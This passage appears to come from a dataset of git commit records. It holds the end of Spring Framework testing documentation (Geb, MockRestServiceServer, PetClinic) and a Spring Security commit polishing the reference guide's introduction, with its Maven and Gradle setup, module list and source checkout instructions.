This is why we can assert that we are on the correct\npage as follows.\n\n[source,groovy]\n----\nthen:\nat CreateMessagePage\nerrors.contains('This field is required.')\n----\n\n[NOTE]\n====\nWe use an assertion in the closure, so that we can determine where things went wrong if\nwe were at the wrong page.\n====\n\nNext, we create a `content` closure that specifies all the areas of interest within the page.\nWe can use a\nhttp:\/\/www.gebish.org\/manual\/current\/intro.html#the_jquery_ish_navigator_api[jQuery-ish Navigator API]\nto select the content we are interested in.\n\nFinally, we can verify that a new message was created successfully.\n\n[source,groovy]\n----\nthen:\nat ViewMessagePage\nsuccess == 'Successfully created a new message'\nid\ndate\nsummary == expectedSummary\nmessage == expectedMessage\n----\n\nFor further details on how to get the most out of Geb, consult\nhttp:\/\/www.gebish.org\/manual\/current\/[The Book of Geb] user's manual.\n\n\n[[spring-mvc-test-client]]\n==== Client-Side REST Tests\nClient-side tests can be used to test code that internally uses the `RestTemplate`.\nThe idea is to declare expected requests and to provide \"stub\" responses so that\nyou can focus on testing the code in isolation, i.e. without running a server.\nHere is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(requestTo(\"\/greeting\")).andRespond(withSuccess(\"Hello world!\", MediaType.TEXT_PLAIN));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n\n\tmockServer.verify();\n----\n\nIn the above example, `MockRestServiceServer`, the central class for client-side REST\ntests, configures the `RestTemplate` with a custom `ClientHttpRequestFactory` that\nasserts actual requests against expectations and returns \"stub\" responses. In this case,\nwe expect a request to \"\/greeting\" and want to return a 200 response with\n\"text\/plain\" content. We could define additional expected requests and stub responses as\nneeded. When expected requests and stub responses are defined, the `RestTemplate` can be\nused in client-side code as usual. At the end of testing, `mockServer.verify()` can be\nused to verify that all expectations have been satisfied.\n\nBy default requests are expected in the order in which expectations were declared.\nYou can set the `ignoreExpectOrder` option when building the server, in which case\nall expectations are checked (in order) to find a match for a given request. That\nmeans requests are allowed to come in any order. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tserver = MockRestServiceServer.bindTo(restTemplate).ignoreExpectOrder().build();\n----\n\nEven with unordered requests, by default each request is allowed to execute only once.\nThe `expect` method provides an overloaded variant that accepts an `ExpectedCount`\nargument that specifies a count range, e.g. `once`, `manyTimes`, `max`, `min`,\n`between`, and so on.\n
Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tRestTemplate restTemplate = new RestTemplate();\n\n\tMockRestServiceServer mockServer = MockRestServiceServer.bindTo(restTemplate).build();\n\tmockServer.expect(times(2), requestTo(\"\/foo\")).andRespond(withSuccess());\n\tmockServer.expect(times(3), requestTo(\"\/bar\")).andRespond(withSuccess());\n\n\t\/\/ ...\n\n\tmockServer.verify();\n----\n\nNote that when `ignoreExpectOrder` is not set (the default), and therefore requests\nare expected in order of declaration, then that order only applies to the first of\nany expected request. For example, if \"\/foo\" is expected 2 times followed by \"\/bar\"\n3 times, then there should be a request to \"\/foo\" before there is a request to \"\/bar\",\nbut aside from that, subsequent \"\/foo\" and \"\/bar\" requests can come at any time.\n\nAs an alternative to all of the above, the client-side test support also provides a\n`ClientHttpRequestFactory` implementation that can be configured into a `RestTemplate`\nto bind it to a `MockMvc` instance. That allows processing requests using actual\nserver-side logic but without running a server. Here is an example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tMockMvc mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();\n\tthis.restTemplate = new RestTemplate(new MockMvcClientHttpRequestFactory(mockMvc));\n\n\t\/\/ Test code that uses the above RestTemplate ...\n----\n\n\n\n[[spring-mvc-test-client-static-imports]]\n===== Static Imports\nJust like with server-side tests, the fluent API for client-side tests requires a few\nstatic imports. Those are easy to find by searching __\"MockRest*\"__. Eclipse users\nshould add `\"MockRestRequestMatchers.{asterisk}\"` and `\"MockRestResponseCreators.{asterisk}\"`\nas \"favorite static members\" in the Eclipse preferences under\n__Java -> Editor -> Content Assist -> Favorites__.\nThat allows using content assist after typing the first character of the\nstatic method name. Other IDEs (e.g. IntelliJ) may not require any additional\nconfiguration. Just check the support for code completion on static members.\n\n[[spring-mvc-test-client-resources]]\n===== Further Examples of Client-side REST Tests\nSpring MVC Test's own tests include\nhttps:\/\/github.com\/spring-projects\/spring-framework\/tree\/master\/spring-test\/src\/test\/java\/org\/springframework\/test\/web\/client\/samples[example\ntests] of client-side REST usage.\n\n\n\n[[testing-examples-petclinic]]\n=== PetClinic Example\n\nThe PetClinic application, available on\nhttps:\/\/github.com\/spring-projects\/spring-petclinic[GitHub], illustrates several features\nof the __Spring TestContext Framework__ in a JUnit environment.\n
Most test functionality\nis included in the `AbstractClinicTests`, for which a partial listing is shown below:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport static org.junit.Assert.assertEquals;\n\t\/\/ import ...\n\n\t**@ContextConfiguration**\n\tpublic abstract class AbstractClinicTests **extends AbstractTransactionalJUnit4SpringContextTests** {\n\n\t\t**@Autowired**\n\t\tprotected Clinic clinic;\n\n\t\t@Test\n\t\tpublic void getVets() {\n\t\t\tCollection<Vet> vets = this.clinic.getVets();\n\t\t\tassertEquals(\"JDBC query must show the same number of vets\",\n\t\t\t\t**super.countRowsInTable(\"VETS\")**, vets.size());\n\t\t\tVet v1 = EntityUtils.getById(vets, Vet.class, 2);\n\t\t\tassertEquals(\"Leary\", v1.getLastName());\n\t\t\tassertEquals(1, v1.getNrOfSpecialties());\n\t\t\tassertEquals(\"radiology\", (v1.getSpecialties().get(0)).getName());\n\t\t\t\/\/ ...\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nNotes:\n\n* This test case extends the `AbstractTransactionalJUnit4SpringContextTests` class, from\n which it inherits configuration for Dependency Injection (through the\n `DependencyInjectionTestExecutionListener`) and transactional behavior (through the\n `TransactionalTestExecutionListener`).\n* The `clinic` instance variable -- the application object being tested -- is set by\n Dependency Injection through `@Autowired` semantics.\n* The `getVets()` method illustrates how you can use the inherited `countRowsInTable()`\n method to easily verify the number of rows in a given table, thus verifying correct\n behavior of the application code being tested. This allows for stronger tests and\n lessens dependency on the exact test data. For example, you can add additional rows in\n the database without breaking tests.\n* Like many integration tests that use a database, most of the tests in\n `AbstractClinicTests` depend on a minimum amount of data already in the database before\n the test cases run. Alternatively, you might choose to populate the database within the\n test fixture set up of your test cases -- again, within the same transaction as the\n tests.\n\nThe PetClinic application supports three data access technologies: JDBC, Hibernate, and\nJPA. By declaring `@ContextConfiguration` without any specific resource locations, the\n`AbstractClinicTests` class will have its application context loaded from the default\nlocation, `AbstractClinicTests-context.xml`, which declares a common `DataSource`.\nSubclasses specify additional context locations that must declare a\n`PlatformTransactionManager` and a concrete implementation of `Clinic`.\n\nFor example, the Hibernate implementation of the PetClinic tests contains the following\nimplementation. For this example, `HibernateClinicTests` does not contain a single line\nof code: we only need to declare `@ContextConfiguration`, and the tests are inherited\nfrom `AbstractClinicTests`. 
Because `@ContextConfiguration` is declared without any\nspecific resource locations, the __Spring TestContext Framework__ loads an application\ncontext from all the beans defined in `AbstractClinicTests-context.xml` (i.e., the\ninherited locations) and `HibernateClinicTests-context.xml`, with\n`HibernateClinicTests-context.xml` possibly overriding beans defined in\n`AbstractClinicTests-context.xml`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ContextConfiguration**\n\tpublic class HibernateClinicTests extends AbstractClinicTests { }\n----\n\nIn a large-scale application, the Spring configuration is often split across multiple\nfiles. Consequently, configuration locations are typically specified in a common base\nclass for all application-specific integration tests. Such a base class may also add\nuseful instance variables -- populated by Dependency Injection, naturally -- such as a\n`SessionFactory` in the case of an application using Hibernate.\n\nAs far as possible, you should have exactly the same Spring configuration files in your\nintegration tests as in the deployed environment. One likely point of difference\nconcerns database connection pooling and transaction infrastructure. If you are\ndeploying to a full-blown application server, you will probably use its connection pool\n(available through JNDI) and JTA implementation. Thus, in production, you will use a\n`JndiObjectFactoryBean` or `<jee:jndi-lookup>` for the `DataSource` and\n`JtaTransactionManager`. JNDI and JTA will not be available in out-of-container\nintegration tests, so you should use a combination like the Commons DBCP\n`BasicDataSource` and `DataSourceTransactionManager` or `HibernateTransactionManager`\nfor them. You can factor out this variant behavior into a single XML file, keeping the\nchoice between application server and 'local' configuration separate from all other\nconfiguration, which will not vary between the test and production environments. In\naddition, it is advisable to use properties files for connection settings.\n
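\nFor example, the 'local' variant might look like the following sketch, where the bean names and `jdbc.*` placeholder keys are illustrative assumptions and the placeholders are resolved from a properties file:\n\n[source,xml]\n----\n<!-- local infrastructure variant for out-of-container integration tests -->\n<bean id=\"dataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\" destroy-method=\"close\">\n\t<property name=\"driverClassName\" value=\"${jdbc.driverClassName}\"\/>\n\t<property name=\"url\" value=\"${jdbc.url}\"\/>\n\t<property name=\"username\" value=\"${jdbc.username}\"\/>\n\t<property name=\"password\" value=\"${jdbc.password}\"\/>\n<\/bean>\n\n<bean id=\"transactionManager\" class=\"org.springframework.jdbc.datasource.DataSourceTransactionManager\">\n\t<property name=\"dataSource\" ref=\"dataSource\"\/>\n<\/bean>\n----\n\n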
See the\nPetClinic application for an example.\n\n\n\n\n[[testing-resources]]\n== Further Resources\nConsult the following resources for more information about testing:\n\n* http:\/\/www.junit.org\/[JUnit]: \"__A programmer-oriented testing framework for Java__\".\n Used by the Spring Framework in its test suite.\n* http:\/\/testng.org\/[TestNG]: A testing framework inspired by JUnit with added support\n for annotations, test groups, data-driven testing, distributed testing, etc.\n* http:\/\/joel-costigliola.github.io\/assertj\/[AssertJ]: \"__Fluent assertions for Java__\"\n including support for Java 8 lambdas, streams, etc.\n* http:\/\/en.wikipedia.org\/wiki\/Mock_Object[Mock Objects]: Article in Wikipedia.\n* http:\/\/www.mockobjects.com\/[MockObjects.com]: Web site dedicated to mock objects, a\n technique for improving the design of code within test-driven development.\n* http:\/\/mockito.org\/[Mockito]: Java mock library based on the\n http:\/\/xunitpatterns.com\/Test%20Spy.html[test spy] pattern.\n* http:\/\/www.easymock.org\/[EasyMock]: Java library \"__that provides Mock Objects for\n interfaces (and objects through the class extension) by generating them on the fly\n using Java's proxy mechanism.__\" Used by the Spring Framework in its test suite.\n* http:\/\/www.jmock.org\/[JMock]: Library that supports test-driven development of Java\n code with mock objects.\n* http:\/\/dbunit.sourceforge.net\/[DbUnit]: JUnit extension (also usable with Ant and\n Maven) targeted for database-driven projects that, among other things, puts your\n database into a known state between test runs.\n* http:\/\/grinder.sourceforge.net\/[The Grinder]: Java load testing framework.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f04d8d8937cf92bc616cc4d00cba100a15726f4","subject":"Polish Reference Documentation","message":"Polish Reference Documentation\n\n- Improve emphasis\n- Fix formatting\n- Update to Spring Framework 5\n- Bom -> BOM\n\nFixes: gh-5695\n","repos":"spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,fhanik\/spring-security,rwinch\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,djechelon\/spring-security,djechelon\/spring-security,rwinch\/spring-security,eddumelendez\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/preface\/introduction.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/preface\/introduction.adoc","new_contents":"\n\n[[introduction]]\n== Introduction\n\n\n[[what-is-acegi-security]]\n=== What is Spring Security?\nSpring Security provides comprehensive security services for Java EE-based enterprise software applications.\nThere is a particular emphasis on supporting projects built using The Spring Framework, which is the leading Java EE solution for enterprise software development.\nIf 
you're not using Spring for developing enterprise applications, we warmly encourage you to take a closer look at it.\nSome familiarity with Spring - and in particular dependency injection principles - will help you get up to speed with Spring Security more easily.\n\nPeople use Spring Security for many reasons, but most are drawn to the project after finding the security features of Java EE's Servlet Specification or EJB Specification lack the depth required for typical enterprise application scenarios.\nWhilst mentioning these standards, it's important to recognise that they are not portable at a WAR or EAR level.\nTherefore, if you switch server environments, it is typically a lot of work to reconfigure your application's security in the new target environment.\nUsing Spring Security overcomes these problems, and also brings you dozens of other useful, customisable security features.\n\nAs you probably know two major areas of application security are _authentication_ and _authorization_ (or _access-control_).\nThese are the two main areas that Spring Security targets.\n\"Authentication\" is the process of establishing a principal is who they claim to be (a \"principal\" generally means a user, device or some other system which can perform an action in your application).\n\"Authorization\" refers to the process of deciding whether a principal is allowed to perform an action within your application.\nTo arrive at the point where an authorization decision is needed, the identity of the principal has already been established by the authentication process.\nThese concepts are common, and not at all specific to Spring Security.\n\nAt an authentication level, Spring Security supports a wide range of authentication models.\nMost of these authentication models are either provided by third parties, or are developed by relevant standards bodies such as the Internet Engineering Task Force.\nIn addition, Spring Security provides its own set of authentication features.\nSpecifically, Spring Security currently supports authentication integration with all of these technologies:\n\n\n* HTTP BASIC authentication headers (an IETF RFC-based standard)\n\n* HTTP Digest authentication headers (an IETF RFC-based standard)\n\n* HTTP X.509 client certificate exchange (an IETF RFC-based standard)\n\n* LDAP (a very common approach to cross-platform authentication needs, especially in large environments)\n\n* Form-based authentication (for simple user interface needs)\n\n* OpenID authentication\n\n* Authentication based on pre-established request headers (such as Computer Associates Siteminder)\n\n* Jasig Central Authentication Service (otherwise known as CAS, which is a popular open source single sign-on system)\n\n* Transparent authentication context propagation for Remote Method Invocation (RMI) and HttpInvoker (a Spring remoting protocol)\n\n* Automatic \"remember-me\" authentication (so you can tick a box to avoid re-authentication for a predetermined period of time)\n\n* Anonymous authentication (allowing every unauthenticated call to automatically assume a particular security identity)\n\n* Run-as authentication (which is useful if one call should proceed with a different security identity)\n\n* Java Authentication and Authorization Service (JAAS)\n\n* Java EE container authentication (so you can still use Container Managed Authentication if desired)\n\n* Kerberos\n\n* Java Open Source Single Sign-On (JOSSO) *\n\n* OpenNMS Network Management Platform *\n\n* AppFuse *\n\n* AndroMDA *\n\n* Mule ESB *\n\n* 
Direct Web Request (DWR) *\n\n* Grails *\n\n* Tapestry *\n\n* JTrac *\n\n* Jasypt *\n\n* Roller *\n\n* Elastic Path *\n\n* Atlassian Crowd *\n\n* Your own authentication systems (see below)\n\n\n\n(* Denotes provided by a third party)\n\nMany independent software vendors (ISVs) adopt Spring Security because of this significant choice of flexible authentication models.\nDoing so allows them to quickly integrate their solutions with whatever their end clients need, without undertaking a lot of engineering or requiring the client to change their environment.\nIf none of the above authentication mechanisms suit your needs, Spring Security is an open platform and it is quite simple to write your own authentication mechanism.\nMany corporate users of Spring Security need to integrate with \"legacy\" systems that don't follow any particular security standards, and Spring Security is happy to \"play nicely\" with such systems.\n\nIrrespective of the authentication mechanism, Spring Security provides a deep set of authorization capabilities.\nThere are three main areas of interest: authorizing web requests, authorizing whether methods can be invoked and authorizing access to individual domain object instances.\nTo help you understand the differences, consider the authorization capabilities found in the Servlet Specification web pattern security, EJB Container Managed Security and file system security respectively.\nSpring Security provides deep capabilities in all of these important areas, which we'll explore later in this reference guide.\n\n\n[[history]]\n=== History\nSpring Security began in late 2003 as \"The Acegi Security System for Spring\".\nA question was posed on the Spring Developers' mailing list asking whether there had been any consideration given to a Spring-based security implementation.\nAt the time the Spring community was relatively small (especially compared with the size today!), and indeed Spring itself had only existed as a SourceForge project from early 2003.\nThe response to the question was that it was a worthwhile area, although a lack of time currently prevented its exploration.\n\nWith that in mind, a simple security implementation was built and not released.\nA few weeks later another member of the Spring community inquired about security, and at the time this code was offered to them.\nSeveral other requests followed, and by January 2004 around twenty people were using the code.\nThese pioneering users were joined by others who suggested a SourceForge project was in order, which was duly established in March 2004.\n\nIn those early days, the project didn't have any of its own authentication modules.\nContainer Managed Security was relied upon for the authentication process, with Acegi Security instead focusing on authorization.\nThis was suitable at first, but as more and more users requested additional container support, the fundamental limitation of container-specific authentication realm interfaces became clear.\nThere was also a related issue of adding new JARs to the container's classpath, which was a common source of end user confusion and misconfiguration.\n\nAcegi Security-specific authentication services were subsequently introduced.\nAround a year later, Acegi Security became an official Spring Framework subproject.\nThe 1.0.0 final release was published in May 2006 - after more than two and a half years of active use in numerous production software projects and many hundreds of improvements and community contributions.\n\nAcegi Security became an official 
Spring Portfolio project towards the end of 2007 and was rebranded as _Spring Security_.\n\nToday Spring Security enjoys a strong and active open source community.\nThere are thousands of messages about Spring Security on the support forums.\nThere is an active core of developers who work on the code itself and an active community which also regularly shares patches and supports its peers.\n\n\n[[release-numbering]]\n=== Release Numbering\nIt is useful to understand how Spring Security release numbers work, as it will help you identify the effort (or lack thereof) involved in migrating to future releases of the project.\nEach release uses a standard triplet of integers: MAJOR.MINOR.PATCH.\nThe intent is that MAJOR versions are incompatible, large-scale upgrades of the API.\nMINOR versions should largely retain source and binary compatibility with older minor versions, though there may be some design changes and incompatible updates.\nPATCH level should be perfectly compatible, forwards and backwards, with the possible exception of changes that fix bugs and defects.\n\nThe extent to which you are affected by changes will depend on how tightly integrated your code is.\nIf you are doing a lot of customization, you are more likely to be affected than if you are using a simple namespace configuration.\n\nYou should always test your application thoroughly before rolling out a new version.\n\n\n[[get-spring-security]]\n=== Getting Spring Security\nYou can get hold of Spring Security in several ways.\nYou can download a packaged distribution from the main http:\/\/spring.io\/spring-security[Spring Security] page, download individual jars from the Maven Central repository (or a Spring Maven repository for snapshot and milestone releases) or, alternatively, you can build the project from source yourself.\n\n[[maven]]\n==== Usage with Maven\n\nA minimal Spring Security Maven set of dependencies typically looks like the following:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencies>\n<!-- ... other dependency elements ... -->\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-web<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<dependency>\n\t<groupId>org.springframework.security<\/groupId>\n\t<artifactId>spring-security-config<\/artifactId>\n\t<version>{spring-security-version}<\/version>\n<\/dependency>\n<\/dependencies>\n----\n\nIf you are using additional features like LDAP, OpenID, etc., you will also need to include the appropriate <<modules>>.\n\n[[maven-repositories]]\n===== Maven Repositories\nAll GA releases (i.e. versions ending in .RELEASE) are deployed to Maven Central, so no additional Maven repositories need to be declared in your pom.\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... -->\n<repository>\n\t<id>spring-snapshot<\/id>\n\t<name>Spring Snapshot Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/snapshot<\/url>\n<\/repository>\n<\/repositories>\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.pom.xml\n[source,xml]\n----\n<repositories>\n<!-- ... possibly other repository elements ... 
-->\n<repository>\n\t<id>spring-milestone<\/id>\n\t<name>Spring Milestone Repository<\/name>\n\t<url>http:\/\/repo.spring.io\/milestone<\/url>\n<\/repository>\n<\/repositories>\n----\n\n[[maven-bom]]\n===== Spring Framework BOM\n\nSpring Security builds against Spring Framework {spring-version}, but should generally work with other 5.x releases.\nThe problem that many users will have is that Spring Security's transitive dependencies resolve Spring Framework {spring-version}, which can cause strange classpath problems.\n\nOne (tedious) way to circumvent this issue would be to include all the Spring Framework modules in a http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html#Dependency_Management[<dependencyManagement>] section of your pom.\nAn alternative approach is to include the `spring-framework-bom` within your `<dependencyManagement>` section of your `pom.xml` as shown below:\n\n.pom.xml\n[source,xml]\n[subs=\"verbatim,attributes\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t<dependency>\n\t\t<groupId>org.springframework<\/groupId>\n\t\t<artifactId>spring-framework-bom<\/artifactId>\n\t\t<version>{spring-version}<\/version>\n\t\t<type>pom<\/type>\n\t\t<scope>import<\/scope>\n\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This approach uses Maven's \"bill of materials\" (BOM) concept and is only available in Maven 2.0.9+.\nFor additional details about how dependencies are resolved, refer to http:\/\/maven.apache.org\/guides\/introduction\/introduction-to-dependency-mechanism.html[Maven's Introduction to the Dependency Mechanism documentation].\n\n[[gradle]]\n==== Gradle\nA minimal Spring Security Gradle set of dependencies typically looks like the following:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\ndependencies {\n\tcompile 'org.springframework.security:spring-security-web:{spring-security-version}'\n\tcompile 'org.springframework.security:spring-security-config:{spring-security-version}'\n}\n----\n\nIf you are using additional features like LDAP, OpenID, etc., you will also need to include the appropriate <<modules>>.\n
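\nFor example, a hypothetical build that also uses LDAP authentication would add the corresponding module in the same way (the artifact names match the module descriptions under <<modules>>):\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\ndependencies {\n\tcompile 'org.springframework.security:spring-security-ldap:{spring-security-version}'\n}\n----\n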
versions ending in .RELEASE) are deployed to Maven Central, so using the mavenCentral() repository is sufficient for GA releases.\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmavenCentral()\n}\n----\n\nIf you are using a SNAPSHOT version, you will need to ensure you have the Spring Snapshot repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/snapshot' }\n}\n----\n\nIf you are using a milestone or release candidate version, you will need to ensure you have the Spring Milestone repository defined as shown below:\n\n.build.gradle\n[source,groovy]\n----\nrepositories {\n\tmaven { url 'https:\/\/repo.spring.io\/milestone' }\n}\n----\n\n[[gradle-resolutionStrategy]]\n===== Using Spring 4.0.x and Gradle\n\nBy default, Gradle will use the newest version when resolving transitive dependencies.\nThis means that often no additional work is necessary when running Spring Security {spring-security-version} with Spring Framework {spring-version}.\nHowever, issues can come up at times, so it is best to mitigate this using http:\/\/www.gradle.org\/docs\/current\/dsl\/org.gradle.api.artifacts.ResolutionStrategy.html[Gradle's ResolutionStrategy] as shown below:\n\n.build.gradle\n[source,groovy]\n[subs=\"verbatim,attributes\"]\n----\nconfigurations.all {\n\tresolutionStrategy.eachDependency { DependencyResolveDetails details ->\n\t\tif (details.requested.group == 'org.springframework') {\n\t\t\tdetails.useVersion '{spring-version}'\n\t\t}\n\t}\n}\n----\n\nThis will ensure that all the transitive dependencies of Spring Security use the Spring {spring-version} modules.\n\nNOTE: This example uses Gradle 1.9, but may need modifications to work in future versions of Gradle since this is an incubating feature within Gradle.\n\n[[modules]]\n==== Project Modules\nIn Spring Security 3.0, the codebase has been sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you are using Maven to build your project, then these are the modules you will add to your `pom.xml`.\nEven if you're not using Maven, we'd recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAlternatively, a good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n===== Core - spring-security-core.jar\nContains core authentication and access-control classes and interfaces, remoting support and basic provisioning APIs.\nRequired by any application which uses Spring Security.\nSupports standalone applications, remote clients, method (service layer) security and JDBC user provisioning.\nContains the top-level packages:\n\n* `org.springframework.security.core`\n\n* `org.springframework.security.access`\n\n* `org.springframework.security.authentication`\n\n* `org.springframework.security.provisioning`\n\n\n[[spring-security-remoting]]\n===== Remoting - spring-security-remoting.jar\nProvides integration with Spring Remoting.\nYou don't need this unless you are writing a remote client which uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n===== Web - spring-security-web.jar\nContains filters and related web-security infrastructure code.\nThis includes anything with a servlet API dependency.\nYou'll need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is 
`org.springframework.security.web`.\n\n\n[[spring-security-config]]\n===== Config - spring-security-config.jar\nContains the security namespace parsing code and Java configuration code.\nYou need it if you are using the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n===== LDAP - spring-security-ldap.jar\nLDAP authentication and provisioning code.\nRequired if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n===== OAuth 2.0 Core - spring-security-oauth2-core.jar\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the _OAuth 2.0 Authorization Framework_ and for _OpenID Connect Core 1.0_.\nIt is required by applications that use _OAuth 2.0_ or _OpenID Connect Core 1.0_, such as Client, Resource Server, and Authorization Server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n===== OAuth 2.0 Client - spring-security-oauth2-client.jar\n`spring-security-oauth2-client.jar` is Spring Security's client support for the _OAuth 2.0 Authorization Framework_ and _OpenID Connect Core 1.0_.\nRequired by applications leveraging *OAuth 2.0 Login* and\/or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n===== OAuth 2.0 JOSE - spring-security-oauth2-jose.jar\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the _JOSE_ (JavaScript Object Signing and Encryption) framework.\nThe _JOSE_ framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n===== ACL - spring-security-acl.jar\nSpecialized domain object ACL implementation.\nUsed to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n===== CAS - spring-security-cas.jar\nSpring Security's CAS client integration.\nRequired if you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n===== OpenID - spring-security-openid.jar\nOpenID web authentication support.\nUsed to authenticate users against an external OpenID server.\nThe main package is `org.springframework.security.openid`.\nRequires OpenID4Java.\n\n\n[[spring-security-test]]\n===== Test - spring-security-test.jar\nSupport for testing with Spring Security.\n\n\n[[get-source]]\n==== Checking out the Source\nSince Spring Security is an Open Source project, we'd strongly encourage you to check out the source code using git.\nThis will give you full access to all the sample applications, and you can easily build the most up-to-date version of the project.\nHaving the source for a project is also a huge help in debugging.\nException stack traces are no longer obscure black-box issues; instead you can get straight to the line that's causing the 
problem and work out what's happening.\nThe source is the ultimate documentation for a project and often the simplest place to find out how something actually works.\n\nTo obtain the source for the project, use the following git command:\n\n[source,txt]\n----\ngit clone https:\/\/github.com\/spring-projects\/spring-security.git\n----\n\nThis will give you access to the entire project history (including all releases and branches) on your local machine.\n","old_contents":"\n\n[[introduction]]\n== Introduction\n\n\n[[what-is-acegi-security]]\n=== What is Spring Security?\nSpring Security provides comprehensive security services for Java EE-based enterprise software applications.\nThere is a particular emphasis on supporting projects built using The Spring Framework, which is the leading Java EE solution for enterprise software development.\nIf you're not using Spring for developing enterprise applications, we warmly encourage you to take a closer look at it.\nSome familiarity with Spring - and in particular dependency injection principles - will help you get up to speed with Spring Security more easily.\n\nPeople use Spring Security for many reasons, but most are drawn to the project after finding the security features of Java EE's Servlet Specification or EJB Specification lack the depth required for typical enterprise application scenarios.\nWhilst mentioning these standards, it's important to recognise that they are not portable at a WAR or EAR level.\nTherefore, if you switch server environments, it is typically a lot of work to reconfigure your application's security in the new target environment.\nUsing Spring Security overcomes these problems, and also brings you dozens of other useful, customisable security features.\n\nAs you probably know two major areas of application security are \"authentication\" and \"authorization\" (or \"access-control\").\nThese are the two main areas that Spring Security targets.\n\"Authentication\" is the process of establishing a principal is who they claim to be (a \"principal\" generally means a user, device or some other system which can perform an action in your application).\n\"Authorization\" refers to the process of deciding whether a principal is allowed to perform an action within your application.\nTo arrive at the point where an authorization decision is needed, the identity of the principal has already been established by the authentication process.\nThese concepts are common, and not at all specific to Spring Security.\n\nAt an authentication level, Spring Security supports a wide range of authentication models.\nMost of these authentication models are either provided by third parties, or are developed by relevant standards bodies such as the Internet Engineering Task Force.\nIn addition, Spring Security provides its own set of authentication features.\nSpecifically, Spring Security currently supports authentication integration with all of these technologies:\n\n\n* HTTP BASIC authentication headers (an IETF RFC-based standard)\n\n* HTTP Digest authentication headers (an IETF RFC-based standard)\n\n* HTTP X.509 client certificate exchange (an IETF RFC-based standard)\n\n* LDAP (a very common approach to cross-platform authentication needs, especially in large environments)\n\n* Form-based authentication (for simple user interface needs)\n\n* OpenID authentication\n\n* Authentication based on pre-established request headers (such as Computer Associates Siteminder)\n\n* Jasig Central Authentication Service (otherwise known as CAS, which is a 
